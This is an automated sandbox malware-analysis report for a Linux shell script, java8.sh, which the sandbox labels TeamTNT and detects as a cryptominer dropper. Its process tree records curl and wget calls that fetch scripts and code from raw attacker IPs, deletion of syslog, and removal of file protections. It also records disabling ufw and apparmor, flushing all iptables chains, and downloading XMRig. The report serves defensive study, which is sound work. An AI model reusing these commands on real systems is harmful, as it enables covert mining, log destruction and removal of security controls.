Linux Analysis Report
java8.sh

Overview

General Information

Sample Name:java8.sh
Analysis ID:1942029
MD5:b71195987084c3db262bce164d6af6aa
SHA1:3cef141263cfc0746616849ab2783ef130236f90
SHA256:4f4fef3aa02d725b00793b75afcd2d75ecd554a9a23cb3e7d87969b3226f72b1
Infos:

Detection

TeamTNT
Score:80
Range:0 - 100
Whitelisted:false

Signatures

Yara detected TeamTNT
Sample tries to persist itself using System V runlevels
Found strings related to Crypto-Mining
Deletes all firewall rules
Stdout / stderr contain strings indicative of a mining client
Tries to detect Cloud Protection Platforms agents (likely to circumvent detection)
Executes the "iptables" command to insert, remove and/or manipulate rules
Found strings indicative of a multi-platform dropper
Terminates several processes with shell command 'killall'
Reads CPU information from /sys indicative of miner or evasive malware
Executes the "mkdir" command used to create folders
Executes the "grep" command used to find patterns in files or piped streams
Executes the "wget" command typically used for HTTP/S downloading
Reads system information from the proc file system
Uses the "uname" system call to query kernel version information (possible evasion)
Enumerates processes within the "proc" file system
Executes the "systemctl" command used for controlling the systemd system and service manager
Removes protection from files
Executes the "ps" command used to list the status of processes
Executes the "curl" command used to transfer data via the network (typically using HTTP/S)
Executes the "sysctl" command used to retrieve or modify kernel settings
Executes the "sudo" command used to execute a command as another user
Deletes log files
Sample contains strings that are potentially command strings
Creates hidden files and/or directories
Executes the "id" command, possibly to determine if the user is root or not
Executes the "iptables" command used for managing IP filtering and manipulation
Executes the "modprobe" command used for loading kernel modules
HTTP GET or POST without a user agent
Executes the "rm" command used to delete files or directories

Classification

Joe Sandbox Version:35.0.0 Citrine
Analysis ID:1942029
Start date and time:21/07/2022 22:38:51 (2022-07-21 22:38:51 +02:00)
Joe Sandbox Product:Cloud
Overall analysis duration:0h 8m 55s
Hypervisor based Inspection enabled:false
Report type:full
Sample file name:java8.sh
Cookbook file name:defaultlinuxfilecookbook.jbs
Analysis system description:Ubuntu Linux 20.04 x64 (Kernel 5.4.0-72, Firefox 88.0.1, Atril Document Viewer 1.24.0, LibreOffice 6.4.7.2, OpenJDK 11.0.11)
Analysis Mode:default
Detection:MAL
Classification:mal80.spre.troj.evad.mine.linSH@0/9@7/0
Command:bash "/tmp/java8.sh"
PID:7068
Exit Code:
Exit Code Info:
Killed:True
Standard Output:
not Crypto running
rr process not running
Firewall stopped and disabled on system startup
ali cloud monitor not running
WARNING: Generally it is not adviced to run this script under root
vm.nr_hugepages = 1
1GB pages successfully enabled
Mining in background will be performed using moneroocean_miner systemd service.
[*] Removing previous rr miner (if any)
[*] Looking for the latest version of Xmrig miner
[*] Downloading https://github.com/xmrig/xmrig/releases/download/v6.18.0/xmrig-6.18.0-linux-static-x64.tar.gz to /tmp/xmrig.tar.gz
Standard Error:
/tmp/java8.sh: line 7: [: too many arguments
/tmp/java8.sh: line 12: [: too many arguments
/tmp/java8.sh: line 19: [: too many arguments
/tmp/java8.sh: line 26: [: too many arguments
/tmp/java8.sh: line 32: [: too many arguments
/tmp/java8.sh: line 39: [: too many arguments
/tmp/java8.sh: line 46: [: too many arguments
/tmp/java8.sh: line 53: [: too many arguments
/tmp/java8.sh: line 60: [: too many arguments
/tmp/java8.sh: line 67: [: too many arguments
/tmp/java8.sh: line 74: [: too many arguments
/tmp/java8.sh: line 102: cd1: command not found
sysctl: setting key "kernel.nmi_watchdog": Unknown error 524
sysctl: setting key "kernel.nmi_watchdog": Unknown error 524
/tmp/java8.sh: line 114: echo: write error: Unknown error 524
/tmp/java8.sh: line 147: setenforce: command not found
Synchronizing state of apparmor.service with SysV service script with /lib/systemd/systemd-sysv-install.
Executing: /lib/systemd/systemd-sysv-install disable apparmor
Removed /etc/systemd/system/sysinit.target.wants/apparmor.service.
Failed to stop aliyun.service.service: Unit aliyun.service.service not loaded.
Failed to disable unit: Unit file aliyun.service does not exist.
/tmp/java8.sh: line 172: /sys/devices/system/node/node0/hugepages/hugepages-1048576kB/nr_hugepages: No such file or directory
Failed to stop xmrig.service: Unit xmrig.service not loaded.
xmrig: no process found
#=#=#
##O#- #
##O=# #
#=#=-# #
-#O#- # #

0.0%
0.1%
0.1%
0.2%
0.2%
0.3%
0.3%
0.4%
0.4%
0.5%
0.5%
0.5%
0.6%
0.6%
0.7%
  • system is lnxubuntu20
  • bash (PID: 7068, Parent: 6999, MD5: 7063c3930affe123baecd3b340f1ad2c) Arguments: /usr/bin/bash /tmp/java8.sh
    • bash New Fork (PID: 7069, Parent: 7068)
    • curl (PID: 7069, Parent: 7068, MD5: add6bc2195e82c55985ccf49fd4048e6) Arguments: curl -fsSL http://128.199.240.129/php/rr/make-rr.sh
    • bash New Fork (PID: 7070, Parent: 7068)
    • bash (PID: 7070, Parent: 7068, MD5: 7063c3930affe123baecd3b340f1ad2c) Arguments: bash
      • bash New Fork (PID: 7072, Parent: 7070)
      • curl (PID: 7072, Parent: 7070, MD5: add6bc2195e82c55985ccf49fd4048e6) Arguments: curl -sLO http://65.108.148.150/java8-py//make-rr.c
      • bash New Fork (PID: 7073, Parent: 7070)
      • wget (PID: 7073, Parent: 7070, MD5: 996940118df7bb2aaa718589d4e95c08) Arguments: wget --no-hsts -q http://65.108.148.150/java8-py//make-rr.c -O make-rr.c
    • bash New Fork (PID: 7074, Parent: 7068)
    • bash New Fork (PID: 7075, Parent: 7068)
    • bash (PID: 7075, Parent: 7068, MD5: 7063c3930affe123baecd3b340f1ad2c) Arguments: bash
    • bash New Fork (PID: 7077, Parent: 7068)
    • mkdir (PID: 7077, Parent: 7068, MD5: 088c9d1df5a28ed16c726eca15964cb7) Arguments: mkdir /etc/.system/php -p
    • bash New Fork (PID: 7078, Parent: 7068)
    • rm (PID: 7078, Parent: 7068, MD5: aa2b5496fdbfd88e38791ab81f90b95b) Arguments: rm -rf /var/log/syslog
    • bash New Fork (PID: 7079, Parent: 7068)
    • chattr (PID: 7079, Parent: 7068, MD5: fae2c2deaeca3bbf906fb8034304ad32) Arguments: chattr -iua /tmp/
    • bash New Fork (PID: 7080, Parent: 7068)
    • chattr (PID: 7080, Parent: 7068, MD5: fae2c2deaeca3bbf906fb8034304ad32) Arguments: chattr -iua /var/tmp/
    • bash New Fork (PID: 7081, Parent: 7068)
    • ufw (PID: 7081, Parent: 7068, MD5: cd500b8d3d61717085e533cdfc431edf) Arguments: ufw disable
      • ufw New Fork (PID: 7082, Parent: 7081)
      • iptables (PID: 7082, Parent: 7081, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: /usr/sbin/iptables -V
      • ufw New Fork (PID: 7083, Parent: 7081)
      • ufw-init (PID: 7083, Parent: 7081, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /lib/ufw/ufw-init force-stop
        • ufw-init New Fork (PID: 7084, Parent: 7083)
        • ip6tables (PID: 7084, Parent: 7083, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: ip6tables -L INPUT -n
          • modprobe (PID: 7086, Parent: 7084, MD5: 0b44462b1a40df8039d6d61cfff7ea84) Arguments: /sbin/modprobe ip6_tables
        • ufw-init New Fork (PID: 7088, Parent: 7083)
        • iptables (PID: 7088, Parent: 7083, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: iptables -F ufw-logging-deny
        • ufw-init New Fork (PID: 7092, Parent: 7083)
        • iptables (PID: 7092, Parent: 7083, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: iptables -F ufw-logging-allow
        • ufw-init New Fork (PID: 7093, Parent: 7083)
        • iptables (PID: 7093, Parent: 7083, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: iptables -F ufw-not-local
        • ufw-init New Fork (PID: 7094, Parent: 7083)
        • iptables (PID: 7094, Parent: 7083, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: iptables -F ufw-user-logging-input
        • ufw-init New Fork (PID: 7095, Parent: 7083)
        • iptables (PID: 7095, Parent: 7083, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: iptables -F ufw-user-limit-accept
        • ufw-init New Fork (PID: 7096, Parent: 7083)
        • iptables (PID: 7096, Parent: 7083, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: iptables -F ufw-user-limit
        • ufw-init New Fork (PID: 7097, Parent: 7083)
        • iptables (PID: 7097, Parent: 7083, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: iptables -F ufw-skip-to-policy-input
        • ufw-init New Fork (PID: 7098, Parent: 7083)
        • iptables (PID: 7098, Parent: 7083, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: iptables -F ufw-reject-input
        • ufw-init New Fork (PID: 7099, Parent: 7083)
        • iptables (PID: 7099, Parent: 7083, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: iptables -F ufw-after-logging-input
        • ufw-init New Fork (PID: 7100, Parent: 7083)
        • iptables (PID: 7100, Parent: 7083, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: iptables -F ufw-after-input
        • ufw-init New Fork (PID: 7101, Parent: 7083)
        • iptables (PID: 7101, Parent: 7083, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: iptables -F ufw-user-input
        • ufw-init New Fork (PID: 7102, Parent: 7083)
        • iptables (PID: 7102, Parent: 7083, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: iptables -F ufw-before-input
        • ufw-init New Fork (PID: 7103, Parent: 7083)
        • iptables (PID: 7103, Parent: 7083, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: iptables -F ufw-before-logging-input
        • ufw-init New Fork (PID: 7104, Parent: 7083)
        • iptables (PID: 7104, Parent: 7083, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: iptables -F ufw-skip-to-policy-forward
        • ufw-init New Fork (PID: 7105, Parent: 7083)
        • iptables (PID: 7105, Parent: 7083, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: iptables -F ufw-reject-forward
        • ufw-init New Fork (PID: 7106, Parent: 7083)
        • iptables (PID: 7106, Parent: 7083, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: iptables -F ufw-after-logging-forward
        • ufw-init New Fork (PID: 7107, Parent: 7083)
        • iptables (PID: 7107, Parent: 7083, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: iptables -F ufw-after-forward
        • ufw-init New Fork (PID: 7108, Parent: 7083)
        • iptables (PID: 7108, Parent: 7083, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: iptables -F ufw-user-logging-forward
        • ufw-init New Fork (PID: 7109, Parent: 7083)
        • iptables (PID: 7109, Parent: 7083, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: iptables -F ufw-user-forward
        • ufw-init New Fork (PID: 7110, Parent: 7083)
        • iptables (PID: 7110, Parent: 7083, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: iptables -F ufw-before-forward
        • ufw-init New Fork (PID: 7111, Parent: 7083)
        • iptables (PID: 7111, Parent: 7083, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: iptables -F ufw-before-logging-forward
        • ufw-init New Fork (PID: 7112, Parent: 7083)
        • iptables (PID: 7112, Parent: 7083, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: iptables -F ufw-track-forward
        • ufw-init New Fork (PID: 7113, Parent: 7083)
        • iptables (PID: 7113, Parent: 7083, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: iptables -F ufw-track-output
        • ufw-init New Fork (PID: 7114, Parent: 7083)
        • iptables (PID: 7114, Parent: 7083, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: iptables -F ufw-track-input
        • ufw-init New Fork (PID: 7115, Parent: 7083)
        • iptables (PID: 7115, Parent: 7083, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: iptables -F ufw-skip-to-policy-output
        • ufw-init New Fork (PID: 7116, Parent: 7083)
        • iptables (PID: 7116, Parent: 7083, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: iptables -F ufw-reject-output
        • ufw-init New Fork (PID: 7117, Parent: 7083)
        • iptables (PID: 7117, Parent: 7083, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: iptables -F ufw-after-logging-output
        • ufw-init New Fork (PID: 7118, Parent: 7083)
        • iptables (PID: 7118, Parent: 7083, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: iptables -F ufw-after-output
        • ufw-init New Fork (PID: 7119, Parent: 7083)
        • iptables (PID: 7119, Parent: 7083, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: iptables -F ufw-user-logging-output
        • ufw-init New Fork (PID: 7120, Parent: 7083)
        • iptables (PID: 7120, Parent: 7083, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: iptables -F ufw-user-output
        • ufw-init New Fork (PID: 7121, Parent: 7083)
        • iptables (PID: 7121, Parent: 7083, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: iptables -F ufw-before-output
        • ufw-init New Fork (PID: 7122, Parent: 7083)
        • iptables (PID: 7122, Parent: 7083, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: iptables -F ufw-before-logging-output
        • ufw-init New Fork (PID: 7123, Parent: 7083)
        • iptables (PID: 7123, Parent: 7083, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: iptables -Z ufw-logging-deny
        • ufw-init New Fork (PID: 7124, Parent: 7083)
        • iptables (PID: 7124, Parent: 7083, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: iptables -Z ufw-logging-allow
        • ufw-init New Fork (PID: 7125, Parent: 7083)
        • iptables (PID: 7125, Parent: 7083, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: iptables -Z ufw-not-local
        • ufw-init New Fork (PID: 7126, Parent: 7083)
        • iptables (PID: 7126, Parent: 7083, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: iptables -Z ufw-user-logging-input
        • ufw-init New Fork (PID: 7127, Parent: 7083)
        • iptables (PID: 7127, Parent: 7083, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: iptables -Z ufw-user-limit-accept
        • ufw-init New Fork (PID: 7128, Parent: 7083)
        • iptables (PID: 7128, Parent: 7083, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: iptables -Z ufw-user-limit
        • ufw-init New Fork (PID: 7129, Parent: 7083)
        • iptables (PID: 7129, Parent: 7083, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: iptables -Z ufw-skip-to-policy-input
        • ufw-init New Fork (PID: 7130, Parent: 7083)
        • iptables (PID: 7130, Parent: 7083, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: iptables -Z ufw-reject-input
        • ufw-init New Fork (PID: 7131, Parent: 7083)
        • iptables (PID: 7131, Parent: 7083, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: iptables -Z ufw-after-logging-input
        • ufw-init New Fork (PID: 7132, Parent: 7083)
        • iptables (PID: 7132, Parent: 7083, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: iptables -Z ufw-after-input
        • ufw-init New Fork (PID: 7133, Parent: 7083)
        • iptables (PID: 7133, Parent: 7083, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: iptables -Z ufw-user-input
        • ufw-init New Fork (PID: 7134, Parent: 7083)
        • iptables (PID: 7134, Parent: 7083, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: iptables -Z ufw-before-input
        • ufw-init New Fork (PID: 7135, Parent: 7083)
        • iptables (PID: 7135, Parent: 7083, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: iptables -Z ufw-before-logging-input
        • ufw-init New Fork (PID: 7136, Parent: 7083)
        • iptables (PID: 7136, Parent: 7083, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: iptables -Z ufw-skip-to-policy-forward
        • ufw-init New Fork (PID: 7137, Parent: 7083)
        • iptables (PID: 7137, Parent: 7083, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: iptables -Z ufw-reject-forward
        • ufw-init New Fork (PID: 7138, Parent: 7083)
        • iptables (PID: 7138, Parent: 7083, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: iptables -Z ufw-after-logging-forward
        • ufw-init New Fork (PID: 7139, Parent: 7083)
        • iptables (PID: 7139, Parent: 7083, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: iptables -Z ufw-after-forward
        • ufw-init New Fork (PID: 7140, Parent: 7083)
        • iptables (PID: 7140, Parent: 7083, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: iptables -Z ufw-user-logging-forward
        • ufw-init New Fork (PID: 7141, Parent: 7083)
        • iptables (PID: 7141, Parent: 7083, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: iptables -Z ufw-user-forward
        • ufw-init New Fork (PID: 7142, Parent: 7083)
        • iptables (PID: 7142, Parent: 7083, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: iptables -Z ufw-before-forward
        • ufw-init New Fork (PID: 7143, Parent: 7083)
        • iptables (PID: 7143, Parent: 7083, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: iptables -Z ufw-before-logging-forward
        • ufw-init New Fork (PID: 7144, Parent: 7083)
        • iptables (PID: 7144, Parent: 7083, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: iptables -Z ufw-track-forward
        • ufw-init New Fork (PID: 7145, Parent: 7083)
        • iptables (PID: 7145, Parent: 7083, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: iptables -Z ufw-track-output
        • ufw-init New Fork (PID: 7146, Parent: 7083)
        • iptables (PID: 7146, Parent: 7083, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: iptables -Z ufw-track-input
        • ufw-init New Fork (PID: 7147, Parent: 7083)
        • iptables (PID: 7147, Parent: 7083, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: iptables -Z ufw-skip-to-policy-output
        • ufw-init New Fork (PID: 7148, Parent: 7083)
        • iptables (PID: 7148, Parent: 7083, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: iptables -Z ufw-reject-output
        • ufw-init New Fork (PID: 7149, Parent: 7083)
        • iptables (PID: 7149, Parent: 7083, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: iptables -Z ufw-after-logging-output
        • ufw-init New Fork (PID: 7150, Parent: 7083)
        • iptables (PID: 7150, Parent: 7083, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: iptables -Z ufw-after-output
        • ufw-init New Fork (PID: 7151, Parent: 7083)
        • iptables (PID: 7151, Parent: 7083, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: iptables -Z ufw-user-logging-output
        • ufw-init New Fork (PID: 7152, Parent: 7083)
        • iptables (PID: 7152, Parent: 7083, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: iptables -Z ufw-user-output
        • ufw-init New Fork (PID: 7153, Parent: 7083)
        • iptables (PID: 7153, Parent: 7083, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: iptables -Z ufw-before-output
        • ufw-init New Fork (PID: 7154, Parent: 7083)
        • iptables (PID: 7154, Parent: 7083, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: iptables -Z ufw-before-logging-output
        • ufw-init New Fork (PID: 7155, Parent: 7083)
        • iptables (PID: 7155, Parent: 7083, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: iptables -X ufw-logging-deny
        • ufw-init New Fork (PID: 7156, Parent: 7083)
        • iptables (PID: 7156, Parent: 7083, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: iptables -X ufw-logging-allow
        • ufw-init New Fork (PID: 7157, Parent: 7083)
        • iptables (PID: 7157, Parent: 7083, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: iptables -X ufw-not-local
        • ufw-init New Fork (PID: 7158, Parent: 7083)
        • iptables (PID: 7158, Parent: 7083, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: iptables -X ufw-user-logging-input
        • ufw-init New Fork (PID: 7159, Parent: 7083)
        • iptables (PID: 7159, Parent: 7083, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: iptables -X ufw-user-logging-output
        • ufw-init New Fork (PID: 7160, Parent: 7083)
        • iptables (PID: 7160, Parent: 7083, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: iptables -X ufw-user-logging-forward
        • ufw-init New Fork (PID: 7161, Parent: 7083)
        • iptables (PID: 7161, Parent: 7083, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: iptables -X ufw-user-limit-accept
        • ufw-init New Fork (PID: 7162, Parent: 7083)
        • iptables (PID: 7162, Parent: 7083, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: iptables -X ufw-user-limit
        • ufw-init New Fork (PID: 7163, Parent: 7083)
        • iptables (PID: 7163, Parent: 7083, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: iptables -X ufw-user-input
        • ufw-init New Fork (PID: 7164, Parent: 7083)
        • iptables (PID: 7164, Parent: 7083, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: iptables -X ufw-user-forward
        • ufw-init New Fork (PID: 7165, Parent: 7083)
        • iptables (PID: 7165, Parent: 7083, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: iptables -X ufw-user-output
        • ufw-init New Fork (PID: 7166, Parent: 7083)
        • iptables (PID: 7166, Parent: 7083, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: iptables -X ufw-skip-to-policy-input
        • ufw-init New Fork (PID: 7167, Parent: 7083)
        • iptables (PID: 7167, Parent: 7083, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: iptables -X ufw-skip-to-policy-output
        • ufw-init New Fork (PID: 7168, Parent: 7083)
        • iptables (PID: 7168, Parent: 7083, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: iptables -X ufw-skip-to-policy-forward
        • ufw-init New Fork (PID: 7169, Parent: 7083)
        • iptables (PID: 7169, Parent: 7083, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: iptables -P INPUT ACCEPT
        • ufw-init New Fork (PID: 7170, Parent: 7083)
        • iptables (PID: 7170, Parent: 7083, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: iptables -P OUTPUT ACCEPT
        • ufw-init New Fork (PID: 7171, Parent: 7083)
        • iptables (PID: 7171, Parent: 7083, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: iptables -P FORWARD ACCEPT
        • ufw-init New Fork (PID: 7172, Parent: 7083)
        • ip6tables (PID: 7172, Parent: 7083, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: ip6tables -F ufw6-logging-deny
        • ufw-init New Fork (PID: 7173, Parent: 7083)
        • ip6tables (PID: 7173, Parent: 7083, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: ip6tables -F ufw6-logging-allow
        • ufw-init New Fork (PID: 7174, Parent: 7083)
        • ip6tables (PID: 7174, Parent: 7083, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: ip6tables -F ufw6-not-local
        • ufw-init New Fork (PID: 7175, Parent: 7083)
        • ip6tables (PID: 7175, Parent: 7083, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: ip6tables -F ufw6-user-logging-input
        • ufw-init New Fork (PID: 7176, Parent: 7083)
        • ip6tables (PID: 7176, Parent: 7083, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: ip6tables -F ufw6-user-limit-accept
        • ufw-init New Fork (PID: 7177, Parent: 7083)
        • ip6tables (PID: 7177, Parent: 7083, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: ip6tables -F ufw6-user-limit
        • ufw-init New Fork (PID: 7178, Parent: 7083)
        • ip6tables (PID: 7178, Parent: 7083, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: ip6tables -F ufw6-skip-to-policy-input
        • ufw-init New Fork (PID: 7179, Parent: 7083)
        • ip6tables (PID: 7179, Parent: 7083, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: ip6tables -F ufw6-reject-input
        • ufw-init New Fork (PID: 7180, Parent: 7083)
        • ip6tables (PID: 7180, Parent: 7083, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: ip6tables -F ufw6-after-logging-input
        • ufw-init New Fork (PID: 7181, Parent: 7083)
        • ip6tables (PID: 7181, Parent: 7083, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: ip6tables -F ufw6-after-input
        • ufw-init New Fork (PID: 7182, Parent: 7083)
        • ip6tables (PID: 7182, Parent: 7083, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: ip6tables -F ufw6-user-input
        • ufw-init New Fork (PID: 7183, Parent: 7083)
        • ip6tables (PID: 7183, Parent: 7083, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: ip6tables -F ufw6-before-input
        • ufw-init New Fork (PID: 7184, Parent: 7083)
        • ip6tables (PID: 7184, Parent: 7083, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: ip6tables -F ufw6-before-logging-input
        • ufw-init New Fork (PID: 7185, Parent: 7083)
        • ip6tables (PID: 7185, Parent: 7083, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: ip6tables -F ufw6-skip-to-policy-forward
        • ufw-init New Fork (PID: 7186, Parent: 7083)
        • ip6tables (PID: 7186, Parent: 7083, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: ip6tables -F ufw6-reject-forward
        • ufw-init New Fork (PID: 7187, Parent: 7083)
        • ip6tables (PID: 7187, Parent: 7083, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: ip6tables -F ufw6-after-logging-forward
        • ufw-init New Fork (PID: 7188, Parent: 7083)
        • ip6tables (PID: 7188, Parent: 7083, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: ip6tables -F ufw6-after-forward
        • ufw-init New Fork (PID: 7189, Parent: 7083)
        • ip6tables (PID: 7189, Parent: 7083, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: ip6tables -F ufw6-user-logging-forward
        • ufw-init New Fork (PID: 7190, Parent: 7083)
        • ip6tables (PID: 7190, Parent: 7083, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: ip6tables -F ufw6-user-forward
        • ufw-init New Fork (PID: 7191, Parent: 7083)
        • ip6tables (PID: 7191, Parent: 7083, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: ip6tables -F ufw6-before-forward
        • ufw-init New Fork (PID: 7192, Parent: 7083)
        • ip6tables (PID: 7192, Parent: 7083, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: ip6tables -F ufw6-before-logging-forward
        • ufw-init New Fork (PID: 7193, Parent: 7083)
        • ip6tables (PID: 7193, Parent: 7083, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: ip6tables -F ufw6-track-forward
        • ufw-init New Fork (PID: 7194, Parent: 7083)
        • ip6tables (PID: 7194, Parent: 7083, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: ip6tables -F ufw6-track-output
        • ufw-init New Fork (PID: 7195, Parent: 7083)
        • ip6tables (PID: 7195, Parent: 7083, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: ip6tables -F ufw6-track-input
        • ufw-init New Fork (PID: 7196, Parent: 7083)
        • ip6tables (PID: 7196, Parent: 7083, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: ip6tables -F ufw6-skip-to-policy-output
        • ufw-init New Fork (PID: 7197, Parent: 7083)
        • ip6tables (PID: 7197, Parent: 7083, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: ip6tables -F ufw6-reject-output
        • ufw-init New Fork (PID: 7198, Parent: 7083)
        • ip6tables (PID: 7198, Parent: 7083, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: ip6tables -F ufw6-after-logging-output
        • ufw-init New Fork (PID: 7199, Parent: 7083)
        • ip6tables (PID: 7199, Parent: 7083, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: ip6tables -F ufw6-after-output
        • ufw-init New Fork (PID: 7200, Parent: 7083)
        • ip6tables (PID: 7200, Parent: 7083, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: ip6tables -F ufw6-user-logging-output
        • ufw-init New Fork (PID: 7201, Parent: 7083)
        • ip6tables (PID: 7201, Parent: 7083, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: ip6tables -F ufw6-user-output
        • ufw-init New Fork (PID: 7202, Parent: 7083)
        • ip6tables (PID: 7202, Parent: 7083, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: ip6tables -F ufw6-before-output
        • ufw-init New Fork (PID: 7203, Parent: 7083)
        • ip6tables (PID: 7203, Parent: 7083, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: ip6tables -F ufw6-before-logging-output
        • ufw-init New Fork (PID: 7204, Parent: 7083)
        • ip6tables (PID: 7204, Parent: 7083, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: ip6tables -Z ufw6-logging-deny
        • ufw-init New Fork (PID: 7205, Parent: 7083)
        • ip6tables (PID: 7205, Parent: 7083, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: ip6tables -Z ufw6-logging-allow
        • ufw-init New Fork (PID: 7206, Parent: 7083)
        • ip6tables (PID: 7206, Parent: 7083, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: ip6tables -Z ufw6-not-local
        • ufw-init New Fork (PID: 7207, Parent: 7083)
        • ip6tables (PID: 7207, Parent: 7083, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: ip6tables -Z ufw6-user-logging-input
